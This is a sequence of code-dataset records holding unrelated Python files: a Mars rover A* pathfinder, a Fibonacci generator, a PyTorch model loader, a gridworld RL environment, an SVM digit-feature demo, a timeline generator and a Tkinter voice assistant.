self.goal_test(current_site, target_site):\n final_path = self.form_route(child_parent_dict, current_site)\n return final_path\n\n explored.append(current_site)\n\n for action in self.actions:\n site = eval(\"current_site\" + \".\" + self.actions.get(action) + \"(\" + self.col + \", \" + self.row + \")\")\n if site is not None:\n if site not in explored and site not in priority_frontier:\n if abs(int(self.state[site.y][site.x]) - int(self.state[current_site.y][current_site.x])) <= \\\n int(self.max_z_elevation):\n child_parent_dict[site] = current_site\n if self.is_move_diagonal(action):\n site_path_cost[site] = site_path_cost.get(current_site) + 14\n priority_frontier[site] = site_path_cost.get(site)\n else:\n site_path_cost[site] = site_path_cost.get(current_site) + 10\n priority_frontier[site] = site_path_cost.get(site)\n\n # If cell is visited check if current path cost for that cell is less than path cost associated\n # with it previously If yes, associate this new value to the cell. Change its parent to the\n # current site\n else:\n if self.is_move_diagonal(action):\n if priority_frontier.get(site) > site_path_cost.get(current_site) + 14:\n child_parent_dict[site] = current_site\n priority_frontier[site] = site_path_cost.get(current_site) + 14\n site_path_cost[site] = site_path_cost.get(current_site) + 14\n else:\n if priority_frontier.get(site) > site_path_cost.get(current_site) + 10:\n child_parent_dict[site] = current_site\n priority_frontier[site] = site_path_cost.get(current_site) + 10\n site_path_cost[site] = site_path_cost.get(current_site) + 10\n\n # A* Search Algorithm\n def a_star(self, target_site):\n # Heuristic used: Diagonal Distance\n\n diagonal_distance = max(\n (abs(int(self.landing_site.x) - int(target_site.x))), (abs(int(self.landing_site.y) - int(target_site.y))),\n abs(int(self.state[self.landing_site.y][self.landing_site.x]) - int(\n self.state[int(target_site.y)][int(target_site.x)])))\n\n # dictionary to store sites with their f(n) = g(n) + h(n) values\n priority_frontier = {self.landing_site: 0 + diagonal_distance}\n\n # list to keep track of visited sites\n explored = []\n\n # dictionary to store parent location of each cell\n child_parent_dict = {}\n\n # dictionary to maintain all the cell locations with f(n)\n site_path_cost = {self.landing_site: 0 + diagonal_distance}\n\n while True:\n if not priority_frontier:\n return \"FAIL\"\n\n # sort the priority queue by path cost\n sites_sorted_by_path_cost = sorted(priority_frontier.items(), key=operator.itemgetter(1))\n\n # pop the cell location with lowest path cost\n current_site = sites_sorted_by_path_cost[0][0]\n del priority_frontier[current_site]\n\n if self.goal_test(current_site, target_site):\n final_path = self.form_route(child_parent_dict, current_site)\n return final_path\n\n explored.append(current_site)\n\n for action in self.actions:\n site = eval(\"current_site\" + \".\" + self.actions.get(action) + \"(\" + self.col + \", \" + self.row + \")\")\n if site is not None:\n if site not in explored and site not in priority_frontier:\n if abs(int(self.state[site.y][site.x]) - int(self.state[current_site.y][current_site.x])) <= \\\n int(self.max_z_elevation):\n # calculate diagonal distance between site and target site\n heuristic = max(\n (abs(int(site.x) - int(target_site.x))), (abs(int(site.y) - int(target_site.y))),\n abs(int(self.state[site.y][site.x]) - int(\n self.state[int(target_site.y)][int(target_site.x)])))\n z_elevation_diff = abs(int(self.state[site.y][site.x]) - int(\n self.state[int(target_site.y)][int(target_site.x)]))\n child_parent_dict[site] = current_site\n if self.is_move_diagonal(action):\n site_path_cost[site] = (site_path_cost.get(\n current_site) + 14 + z_elevation_diff) + heuristic\n priority_frontier[site] = site_path_cost.get(site)\n else:\n site_path_cost[site] = (site_path_cost.get(\n current_site) + 10 + z_elevation_diff) + heuristic\n priority_frontier[site] = site_path_cost.get(site)\n\n # If cell is visited check if current f(n) for that cell is less than f(n) associated with it\n # previously If yes, associate this new value to the cell. Change its parent to the current site\n else:\n # calculate diagonal distance between site and target site\n heuristic = max(\n (abs(int(site.x) - int(target_site.x))), (abs(int(site.y) - int(target_site.y))),\n abs(int(self.state[site.y][site.x]) - int(\n self.state[int(target_site.y)][int(target_site.x)])))\n\n z_elevation_diff = abs(\n int(self.state[site.y][site.x]) - int(self.state[int(target_site.y)][int(target_site.x)]))\n\n if self.is_move_diagonal(action):\n if priority_frontier.get(site) > (\n site_path_cost.get(current_site) + 14 + z_elevation_diff) + heuristic:\n child_parent_dict[site] = current_site\n site_path_cost[site] = (site_path_cost.get(\n current_site) + 14 + z_elevation_diff) + heuristic\n priority_frontier[site] = site_path_cost.get(site)\n else:\n if priority_frontier.get(site) > (\n site_path_cost.get(current_site) + 10 + z_elevation_diff) + heuristic:\n child_parent_dict[site] = current_site\n site_path_cost[site] = (site_path_cost.get(\n current_site) + 10 + z_elevation_diff) + heuristic\n priority_frontier[site] = site_path_cost.get(site)\n\n\n# open the input file to read the input\ninput_file = open(\"input.txt\")\n\n# search_type would store the type of algorithm to be implemented\nsearch_type = input_file.readline().strip()\n\n# width and height would store the size of the search space\nwidth, height = input_file.readline().split()\n\n# store the x and y location of the landing site\nx_loc_of_landing_site, y_loc_of_landing_site = input_file.readline().split()\n\n# start_site of type Node would store the location of landing site\nstart_site = Node(int(x_loc_of_landing_site), int(y_loc_of_landing_site))\n\n# store the maximum allowable z elevation differences to be able to travel from one site to another\nz_elevation = input_file.readline().strip()\n\n# store the number of sites to find path to\nno_of_target_sites = input_file.readline().strip()\n\n# all_target_sites is a list to store the locations of all the target sites\nall_target_sites = []\n\n# add each location to all_target_sites\nfor i in range(int(no_of_target_sites)):\n x, y = input_file.readline().split()\n n = Node(x, y)\n all_target_sites.append(n)\n\n# search_space stores the elevation values for each site\nsearch_space = [line.split() for line in input_file.readlines()]\n\n# create an object of type Search\ns = Search(search_type, start_site, all_target_sites, search_space, z_elevation, width, height)\n\n# final_route is a list that stores the paths for all the target sites\nfinal_route = []\n\n# create an output file to write the output\noutput_file = open(\"output.txt\", 'w')\n\n# store the path for each target site in final_route and write it to the output file\nfor i in range(int(no_of_target_sites)):\n final_route = s.find_route(all_target_sites[i])\n if final_route is not \"FAIL\":\n for j in range(len(final_route)):\n output_file.write(str(final_route[j]) + \" \")\n output_file.write(\"\\n\")\n else:\n output_file.write(str(final_route) + \"\\n\")\n\n# close the input and output files\noutput_file.close()\ninput_file.close()","repo_name":"SayaliLagad2706/Mars-Rover","sub_path":"mars_rover.py","file_name":"mars_rover.py","file_ext":"py","file_size_in_byte":17023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20434112044","text":"# fibonacci numbers\n# Formula (Fn = Fn1 + Fn2)\n\ndef fibonacci(num):\n Fn1 = 0\n Fn2 = 1\n for x in range(num):\n yield Fn1\n temp = Fn1\n Fn1 = Fn2\n Fn2 = temp + Fn2\n\n\nfor x in fibonacci(21):\n print(x)\n","repo_name":"ZenpaiCodes/Learning-code","sub_path":"Zero_to_Master/PROJECTS/small_PROJECTS/fibonacci numbers.py","file_name":"fibonacci numbers.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35878117407","text":"#!/usr/bin/env python3\n\nimport re\nfrom pathlib import Path\nimport importlib\nimport yaml\nimport jsonschema\nimport torch\nfrom torch import nn\n\n\n_ENCODER_KWARGS_SCHEMA = {\n 'type': 'object',\n 'required': [\n 'dimension',\n 'num_heads',\n 'dim_feedforward',\n 'num_layers',\n 'activation_function',\n 'dropout',\n 'checkpointing',\n ],\n 'properties': {\n 'dimension': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'num_heads': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'dim_feedforward': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'num_layers': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'activation_function': {\n 'type': 'string',\n 'enum': [\n 'relu',\n 'gelu',\n ],\n },\n 'dropout': {\n 'type': 'number',\n 'minimum': 0.0,\n 'exclusiveMaximum': 1.0,\n },\n 'checkpointing': {\n 'type': 'boolean',\n },\n },\n 'additionalProperties': False,\n}\n\n\n_DECODER_KWARGS_SCHEMA = {\n 'type': 'object',\n 'required': [\n 'dimension',\n 'dim_final_feedforward',\n 'activation_function',\n 'dropout',\n ],\n 'properties': {\n 'dimension': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'dim_final_feedforward': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'activation_function': {\n 'type': 'string',\n 'enum': [\n 'relu',\n 'gelu',\n ],\n },\n 'dropout': {\n 'type': 'number',\n 'minimum': 0.0,\n 'exclusiveMaximum': 1.0,\n },\n },\n 'additionalProperties': False\n}\n\n\n_ENCODER_DECODER_SNAPSHOTS_CONFIG_SCHEMA = {\n 'type': 'object',\n 'required': [\n 'encoder',\n 'decoder',\n 'model',\n ],\n 'properties': {\n 'encoder': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'kwargs',\n 'snapshot',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'kwargs': _ENCODER_KWARGS_SCHEMA,\n 'snapshot': {\n 'type': 'string',\n },\n },\n 'additionalProperties': False,\n },\n 'decoder': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'kwargs',\n 'snapshot',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'kwargs': _DECODER_KWARGS_SCHEMA,\n 'snapshot': {\n 'type': 'string',\n },\n },\n 'additionalProperties': False,\n },\n 'model': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n },\n 'additionalProperties': False,\n },\n },\n 'additionalProperties': False,\n}\n\n\n_MODEL_SNAPSHOT_CONFIG_SCHEMA = {\n 'type': 'object',\n 'required': [\n 'encoder',\n 'decoder',\n 'model',\n ],\n 'properties': {\n 'encoder': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'kwargs',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'kwargs': _ENCODER_KWARGS_SCHEMA,\n },\n 'additionalProperties': False,\n },\n 'decoder': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'kwargs',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'kwargs': _DECODER_KWARGS_SCHEMA,\n },\n 'additionalProperties': False,\n },\n 'model': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'snapshot',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'snapshot': {\n 'type': 'string',\n },\n },\n 'additionalProperties': False,\n },\n },\n 'additionalProperties': False,\n}\n\n\n_MODEL_CONFIG_SCHEMA = {\n 'oneOf': [\n _ENCODER_DECODER_SNAPSHOTS_CONFIG_SCHEMA,\n _MODEL_SNAPSHOT_CONFIG_SCHEMA\n ]\n}\n\n\ndef load_model(config_path: Path) -> nn.Module:\n if not config_path.exists():\n raise RuntimeError(f'{config_path}: Does not exist.')\n if not config_path.is_file():\n raise RuntimeError(f'{config_path}: Not a file.')\n\n with open(config_path) as f:\n config = yaml.load(f, Loader=yaml.Loader)\n jsonschema.validate(config, _MODEL_CONFIG_SCHEMA)\n\n this_dir = config_path.parent\n\n encoder_config = config['encoder']\n encoder_module = importlib.import_module(encoder_config['module'])\n encoder_class = getattr(encoder_module, encoder_config['class'])\n encoder_instance = encoder_class(**encoder_config['kwargs'])\n\n decoder_config = config['decoder']\n decoder_module = importlib.import_module(decoder_config['module'])\n decoder_class = getattr(decoder_module, decoder_config['class'])\n decoder_instance = decoder_class(**decoder_config['kwargs'])\n\n model_config = config['model']\n model_module = importlib.import_module(model_config['module'])\n model_class = getattr(model_module, model_config['class'])\n model = model_class(encoder_instance, decoder_instance)\n\n if 'snapshot' in encoder_config:\n assert('snapshot' in decoder_config)\n encoder_config['snapshot'] = re.sub(\n '^\\\\./', str(this_dir) + '/', encoder_config['snapshot'])\n decoder_config['snapshot'] = re.sub(\n '^\\\\./', str(this_dir) + '/', decoder_config['snapshot'])\n encoder_instance.load_state_dict(torch.load(encoder_config['snapshot']))\n decoder_instance.load_state_dict(torch.load(decoder_config['snapshot']))\n else:\n assert('snapshot' in model_config)\n model_config['snapshot'] = re.sub(\n '^\\\\./', str(this_dir) + '/', model_config['snapshot'])\n model.load_state_dict(torch.load(model_config['snapshot']))\n\n return model\n","repo_name":"smly/kanachan","sub_path":"kanachan/training/bert/model_loader.py","file_name":"model_loader.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"72863275572","text":"import gym\nfrom .gym_minigrid.envs.human import HumanEnv\nfrom onpolicy.envs.gridworld.gym_minigrid.register import register\nimport numpy as np\nfrom icecream import ic\nfrom onpolicy.utils.multi_discrete import MultiDiscrete\n\nclass GridWorldEnv(object):\n def __init__(self, args):\n\n self.num_agents = args.num_agents\n self.scenario_name = args.scenario_name\n self.use_random_pos = args.use_random_pos\n self.agent_pos = None if self.use_random_pos else args.agent_pos\n self.num_obstacles = args.num_obstacles\n self.use_single_reward = args.use_single_reward\n self.use_discrect = args.use_discrect\n\n register(\n id=self.scenario_name,\n grid_size=args.grid_size,\n max_steps=args.max_steps,\n local_step_num=args.local_step_num,\n agent_view_size=args.agent_view_size,\n num_agents=self.num_agents,\n num_obstacles=self.num_obstacles,\n agent_pos=self.agent_pos,\n use_merge_plan=args.use_merge_plan,\n use_merge=args.use_merge,\n use_constrict_map=args.use_constrict_map,\n use_fc_net=args.use_fc_net,\n use_agent_id=args.use_agent_id,\n use_stack=args.use_stack,\n use_orientation=args.use_orientation,\n use_same_location=args.use_same_location,\n use_complete_reward=args.use_complete_reward,\n use_agent_obstacle=args.use_agent_obstacle,\n use_multiroom=args.use_multiroom,\n use_irregular_room=args.use_irregular_room,\n use_time_penalty=args.use_time_penalty,\n use_overlap_penalty=args.use_overlap_penalty,\n entry_point='onpolicy.envs.gridworld.gym_minigrid.envs:MultiExplorationEnv',\n astar_cost_mode=args.astar_cost_mode\n )\n\n self.env = gym.make(self.scenario_name)\n self.max_steps = self.env.max_steps\n # print(\"max step is {}\".format(self.max_steps))\n\n self.observation_space = self.env.observation_space\n self.share_observation_space = self.env.observation_space\n \n if self.use_discrect:\n self.action_space = [\n MultiDiscrete([[0, args.grid_size - 1],[0, args.grid_size - 1]])\n for _ in range(self.num_agents)\n ]\n else:\n self.action_space = [\n gym.spaces.Box(low=0.0, high=1.0, shape=(2,), dtype=np.float32)\n for _ in range(self.num_agents)\n ]\n\n def seed(self, seed=None):\n if seed is None:\n self.env.seed(1)\n else:\n self.env.seed(seed)\n\n def reset(self, choose=True):\n if choose:\n obs, info = self.env.reset()\n else:\n obs = [\n {\n 'image': np.zeros((self.env.width, self.env.height, 3), dtype='uint8'),\n 'direction': 0,\n 'mission': \" \"\n } for agent_id in range(self.num_agents)\n ]\n info = {}\n return obs, info\n\n def step(self, actions):\n if not np.all(actions == np.ones((self.num_agents, 1)).astype(np.int) * (-1.0)):\n obs, rewards, done, infos = self.env.step(actions)\n dones = np.array([done for agent_id in range(self.num_agents)])\n if self.use_single_reward:\n rewards = 0.3 * np.expand_dims(infos['agent_explored_reward'], axis=1) + 0.7 * np.expand_dims(\n np.array([infos['merge_explored_reward'] for _ in range(self.num_agents)]), axis=1)\n else:\n rewards = np.expand_dims(\n np.array([infos['merge_explored_reward'] for _ in range(self.num_agents)]), axis=1)\n else:\n obs = [\n {\n 'image': np.zeros((self.env.width, self.env.height, 3), dtype='uint8'),\n 'direction': 0,\n 'mission': \" \"\n } for agent_id in range(self.num_agents)\n ]\n rewards = np.zeros((self.num_agents, 1))\n dones = np.array([None for agent_id in range(self.num_agents)])\n infos = {}\n\n return obs, rewards, dones, infos\n\n def close(self):\n self.env.close()\n\n def get_short_term_action(self, input):\n outputs = self.env.get_short_term_action(input)\n return outputs\n\n def render(self, mode=\"human\", short_goal_pos=None):\n if mode == \"human\":\n self.env.render(mode=mode, short_goal_pos=short_goal_pos)\n else:\n return self.env.render(mode=mode, short_goal_pos=short_goal_pos)\n\n def ft_get_short_term_goals(self, args, mode=\"\"):\n mode_list = ['apf', 'utility', 'nearest', 'rrt', 'voronoi']\n assert mode in mode_list, (f\"frontier global mode should be in {mode_list}\")\n return self.env.ft_get_short_term_goals(args, mode=mode)\n\n def ft_get_short_term_actions(self, *args):\n return self.env.ft_get_short_term_actions(*args)\n","repo_name":"yang-xy20/async_mappo","sub_path":"onpolicy/envs/gridworld/GridWorld_Env.py","file_name":"GridWorld_Env.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"42971198265","text":"import cv2 as cv\nimport numpy as np\n\n\nWIDTH = 900\nHEIGHT = 900\nBORDER = 10\nimage_size = 28\ncolors = [(0, 0, 255), (0, 255, 0), (255, 0, 0), (255, 255, 0), (255, 0, 255), \\\n (0, 255, 255), (100, 100, 255), (255, 100, 255), (100, 255, 100), (255, 100, 100)]\n\n###\n### Features\n###\n\n# Michael, Michael, and Will\n# Feature: top-heavy vs bottom-heavy \n# \"bottom-heavy\" means that there's more going on in the bottom of the picture/digit. \n# For example: 6 is bottom-heavy because there are more transitions in the bottom of the digit.\n# \"top-heavy\" means that there's more going on in the top of the picture/digit. \n# For example: 4 and 9 are top-heavy as there are more transitions in the top of the digit\n# Returns a list with the top-weight and bottom-weight as (top, bottom)\ndef top_bottom_balance(img):\n # Get the number of color transitions per row in the image\n transition_array = color_transition_array(img)\n midpoint = len(transition_array)//2 #Get the midpoint of the array\n # Split the transition array into top and bottom of the image\n top_array = transition_array[:midpoint]\n bottom_array = transition_array[midpoint:]\n # Sum the values for number of color transitions in the top and bottom of the picture\n top_value = np.sum(top_array)\n bottom_value = np.sum(bottom_array)\n return [top_value, bottom_value]\n\n# Michael, Michael, and Will\n# Split the image in half and compare the weights\n# (# of color transitions, can be easily modified to do sum of non-white\n# pixel values) of the two halves.\n# The function returns a tuple in the form (top_half, bottom_half), \n# with the bigger number representing which part of the image has more going on\n# Returns a single array with the number of color transistions per row, \n# corresponding to that index in the returned array\ndef color_transition_array(img): \n img2 = img.copy()\n img2[img2 > 0] = 255 # Any pixel not white becomes black\n return (np.sum(abs(img2[:, 1:] - img2[:, :-1])/255, axis=1))\n\n\n\n\n\"\"\"\n Admin Functions\n\"\"\"\n# Read from our file\ndef read_images(filename):\n data = np.loadtxt(filename, delimiter=\",\", dtype='int')\n return data\n\n\n# Dictionary to map each digit to its list of images\ndef make_digit_map(data):\n digit_map = {i:[] for i in range(10)}\n for row in data:\n digit_map[row[0]].append(row[1:].reshape((image_size, image_size)))\n return digit_map\n\n\n# Extract features\n# fnlist is a list of feature-generating functions, each of which should\n# take a 28x28 grayscale (0-255) image, 0=white, and return a 1-d array\n# of numbers\n# Returns a map: digit -> nparray of feature vectors, one row per image\ndef build_feature_map(digit_map, fnlist):\n fmap = {i:[] for i in range(10)}\n for digit in fmap:\n for img in digit_map[digit]:\n feature_vector = []\n for f in fnlist:\n feature_vector += f(img)\n fmap[digit].append(feature_vector)\n return fmap\n\n\n# Set up training data\ndata = read_images(\"data/mnist_medium.csv\")\ndigit_map = make_digit_map(data)\nfeature_map = build_feature_map(digit_map, [top_bottom_balance])\ntrain = []\nlabels = []\nprint(feature_map)\nfor digit in range(10):\n print(digit, len(feature_map[digit]))\n for f in feature_map[digit]:\n train.append(f)\n labels.append(digit)\n\n# Train the SVM\nsvm = cv.ml.SVM_create()\nsvm.setType(cv.ml.SVM_C_SVC)\nsvm.setKernel(cv.ml.SVM_LINEAR)\n#svm.setKernel(cv.ml.SVM_RBF)\nsvm.setTermCriteria((cv.TERM_CRITERIA_MAX_ITER, 100, 1e-6))\nsvm.train(np.array(train).astype(np.float32), cv.ml.ROW_SAMPLE, np.array(labels))\n\n\n# Data for visual representation\nmaxx, maxy = np.max(train, axis=0)\n\nimage = np.ones((HEIGHT, WIDTH, 3), dtype=np.uint8)*255\n# Show the training data\nfor i in range(len(train)):\n y, x = int(train[i][1] * (HEIGHT-BORDER) / maxy) - BORDER, int(train[i][0] * (WIDTH-BORDER) / maxx) - BORDER\n color = colors[labels[i]]\n cv.circle(image, (x, y), 5, color, -1)\n\n\nfor i in range(0, image.shape[0], 2):\n for j in range(0, image.shape[1], 2):\n tx = (j + BORDER)*maxx*1.0 / (WIDTH - BORDER)\n ty = (i + BORDER)*maxy*1.0 / (WIDTH - BORDER)\n sampleMat = np.matrix([[tx, ty]], dtype=np.float32)\n response = int(svm.predict(sampleMat)[1][0])\n image[i,j] = colors[response]\n\ncv.imshow('SVM Simple Example', image) # show it to the user\ncv.waitKey()\n\n\n\n\n","repo_name":"gabriellasanford/2020Vision","sub_path":"svm1.py","file_name":"svm1.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72204088373","text":"# encoding: utf-8\n\nimport os\nimport pandas as pd\nimport codecs\nimport re\n\n\ndirname = os.path.dirname(__file__)\nfilepath = os.path.join(dirname, '..', 'src', 'assets', 'timeline')\nprint(filepath)\n\n\ndef write_timeline(input_file):\n name = os.path.basename(input_file).split('.csv')[0]\n out = codecs.open(os.path.join(\n filepath, '{}.ts'.format(name)), 'wb', encoding='utf-8')\n print(os.path.join(filepath, '{}.ts'.format(name)))\n # start_time = '4:59'\n input_file = os.path.join(filepath, input_file)\n\n # file head\n out.write(\n r'import { ITimelineCastTime } from \"@/assets/timeline/type\";'+'\\n')\n\n out.write(\n f'export const {name}: Record = {{}};\\n\\n\\n')\n x = pd.read_csv(input_file, header=None).values.tolist()\n\n i = 'a'\n\n for line in x:\n skill_name = line[0]\n time = line[1]\n minute, second = translate1_time(time)\n outline = f'{name}.{i} = {{ name: \\\"{skill_name}\\\", time: {{minute: {str(minute)}, second: {str(second)}}}, castTime: 3 }};\\n'\n out.write(outline)\n if i[-1] == 'z':\n i = len(i)*'a' + 'a'\n else:\n i = (len(i)-1)*'a'+chr(ord(i[-1])+1)\n outline = f'{name}.break = {{ name: \\\"BREAK\\\", time: {{minute: {str(0)}, second: {str(0)}}}, castTime: 8 }};\\n'\n out.write(outline)\n out.write(f'\\nObject.freeze({name});\\n')\n\n\ndef translate_time(start_time, end_time):\n start_min, start_sec = [int(x) for x in start_time.split(':')[:2]]\n end_min, end_sec = [int(x) for x in end_time.split(':')[:2]]\n if start_sec >= end_sec:\n sec_dif = start_sec - end_sec\n min_dif = start_min - end_min\n else:\n sec_dif = start_sec+60 - end_sec\n min_dif = start_min - end_min - 1\n return min_dif*60 + sec_dif\n\n\ndef translate1_time(time):\n end_min, end_sec = [int(x) for x in time.split(':')[:2]]\n return end_min, end_sec\n\n\ndef main():\n for file in os.listdir(filepath):\n if file.split('.')[-1] == 'csv':\n write_timeline(file)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NyxSLY/dragalia-dbm","sub_path":"scripts/generate-timeline.py","file_name":"generate-timeline.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74880782771","text":"# For converting Speech to text\nimport speech_recognition as sr\n\n# For converting text to Speech\nimport pyttsx3 as tts\n\n# Use for playing music by using google\nimport pywhatkit as kit\n\n# Current Date And Time\nimport datetime as dt\n\n# Find a result from wikipedia\nimport wikipedia as wiki\n\n# Randomly get a joke\nimport pyjokes as pj\n\nimport os\n\nimport subprocess\n\nimport webbrowser\n\n#tkinter is a GUI of python\nfrom tkinter import *\nfrom PIL import ImageTk,Image\n\n\nlistener = sr.Recognizer()\nSpeaker = tts.init()\n\n# Change Voices 0 for male and 1 for female\nvoices = Speaker.getProperty('voices')\nSpeaker.setProperty('voice', voices[0].id)\n\ndef talk(text):\n Speaker.say(text)\n Speaker.runAndWait()\n\n# Taking and Printing any Command\ndef take_Command():\n try:\n Command = \"\"\n with sr.Microphone() as source:\n talk('I am ready Sir. Please tell me, how can I help you?')\n print('Now I am listening...........')\n voice = listener.listen(source)\n Command = listener.recognize_google(voice)\n Command = Command.lower()\n\n except:\n pass\n return Command\n\n# Taking and Printing any Command\ndef run_Jonny():\n Command = take_Command()\n print(Command)\n\n # Let's Introduce about my Assistant\n if 'who are you' in Command:\n print('My name is Jonny & I am invented by Team Phantom. The members of team phantom are Md Rehan Ali and Md Sabbir Ahmed.')\n talk('My name is Jonny & I am invented by Team Phantom. The members of team phantom are Md Rehan Ali and Md Sabbir Ahmed.')\n\n elif 'yourself' in Command:\n print('My name is Jonny & I am invented by Team Phantom. The members of team phantom are Md Rehan Ali and Md Sabbir Ahmed.')\n talk('My name is Jonny & I am invented by Team Phantom. The members of team phantom are Md Rehan Ali and Md Sabbir Ahmed.')\n\n # Simple Conversation like: Hi, Hello or Good Morning\n elif 'jonny' in Command:\n Command = Command.replace('jonny', '')\n print(Command)\n talk(Command)\n\n # Playing anything using Youtuber\n elif 'play' in Command:\n song = Command.replace('play', '')\n talk('playing'+song)\n kit.playonyt(song)\n\n # Time and date\n elif 'time' in Command:\n time = dt.datetime.now().strftime('%H:%M')\n print(time)\n talk('Current time is ' + time)\n\n # Wikipedia Searching person by mentioning who is\n elif 'who is' in Command:\n person = Command.replace('who is', '')\n info = wiki.summary(person, 2)\n print(info)\n talk(info)\n\n # Wikipedia Searching something by mentioning what is\n elif 'what is' in Command:\n something = Command.replace('what is', '')\n result = wiki.summary(something, 2)\n print(result)\n talk(result)\n\n # Randomly Generated jokes\n elif 'joke' in Command:\n Jokes = pj.get_joke()\n print(Jokes)\n talk(Jokes)\n\n elif 'shutdown' in Command:\n print(Command)\n talk('Wait a Sec ! Your system is on its way to shut down.')\n os.system('shutdown /s /t 0')\n\n elif 'restart' in Command:\n print(Command)\n talk('Wait a Sec ! Your system is on its way to restart.')\n os.system('shutdown /r /t 0')\n\n elif 'notepad' in Command:\n print(Command)\n talk('Opening notepad')\n subprocess.Popen('notepad')\n\n elif 'browser' in Command:\n print(Command)\n talk('Opening Web browser')\n webbrowser.open('https://www.google.com')\n\n elif 'search' in Command:\n Search = Command.replace('search', '')\n talk('searching' + Search)\n print(Command)\n webbrowser.open('https://www.google.com/search?q=' + Search)\n\n elif 'calculator' in Command:\n print('Opening Calculator')\n talk('Opening Calculator')\n subprocess.Popen('calc.exe')\n\n elif 'photo' in Command:\n print('Opening your desired photo')\n talk('Opening your desired photo')\n file_path = 'D:\\Programming\\Python\\Virtual_Assistant\\Assistant.jpg'\n image = Image.open(file_path)\n image.show()\n\n elif 'pdf' in Command:\n print('Opening your desired pdf file')\n talk('Opening your desired pdf file')\n file_path = r'D:\\Programming\\Python\\Virtual_Assistant\\Assistant.pdf'\n os.startfile(file_path)\n\n elif 'video' in Command:\n print('Opening your desired video file')\n talk('Opening your desired video file')\n file_path = r'D:\\Programming\\Python\\Virtual_Assistant\\Assistant.mp4'\n os.startfile(file_path)\n\n elif 'powerpoint file' in Command:\n print('Opening powerpoint file file')\n talk('Opening powerpoint file file')\n file_path = r'D:\\Programming\\Python\\Virtual_Assistant\\Assistant.pptx'\n os.startfile(file_path)\n\n elif 'word' in Command:\n print('Opening MS word')\n talk('Opening MS word')\n application = r'C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE'\n os.startfile(application)\n\n elif 'excel' in Command:\n print('Opening MS Excel')\n talk('Opening MS Excel')\n application = r'C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE'\n os.startfile(application)\n\n\n elif 'powerpoint' in Command:\n print('Opening MS powerpoint')\n talk('Opening MS powerpoint')\n application = r'C:\\Program Files\\Microsoft Office\\Office16\\POWERPNT.EXE'\n os.startfile(application)\n\n elif 'code blocks' in Command:\n print('Opening Code blocks')\n talk('Opening Code blocks')\n application = r'C:\\Program Files\\CodeBlocks\\codeblocks.exe'\n os.startfile(application)\n\n\n\n # Repeating the previous Command\n\n else:\n talk('Please click the run button and say the Command again.')\n\n# Call under while loop\n#while True:\n #run_Jonny()\n\n#tkinter is a GUI of python\n\nroot = Tk()\n\nroot.title('Virtual Assistant')\nroot.geometry('320x320')\n\n#img = ImageTk.PhotoImage(Image.open('Assistant.jpg'))\n#panel = Label(root, image=img)\n#panel.pack(side='right', fill='both', expand='no')\n\nuserText = StringVar()\n\nuserText.set('Welcome to our Virtual World!')\nuserFrame = LabelFrame(root, text='', font=('Railways', 20, 'bold'))\nuserFrame.pack(fill='both', expand='yes')\n\ntop = Message(userFrame, textvariable=userText, bg='light blue', fg='dark blue')\ntop.config(font=(\"Tahoma\", 25, 'bold'))\ntop.pack(side='top', fill='both', expand='yes')\n\nbtn1 = Button(root, text='Run', font=('Tahoma', 18, 'bold'), bg='light green', fg='Green', command=run_Jonny)\nbtn1.pack(fill='x', expand='no')\n\nbtn2 = Button(root, text='Close', font=('Tahoma', 18, 'bold'), bg='light yellow', fg='red', command=root.destroy)\nbtn2.pack(fill='x', expand='no')\n\nroot.mainloop()","repo_name":"MdRehanAli/Virtual_Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27626381005","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Q\n\nfrom .decorators import govt_official_required\nfrom .forms import UserRegistrationForm, CollegeRegistrationForm\nfrom customuser.models import CustomUser, Student, College\n\n# ALGORITHM FOR ID GENERATION\n# 1. Get the last college id from the database\n# 2. Generate the next word in lexicographical order\n# 3. Return the new college id\n# 4. Save the new college id in the database\n\n\ndef generateId():\n last_id = '0000'\n try:\n last_id = College.objects.last().college_id\n except:\n last_id 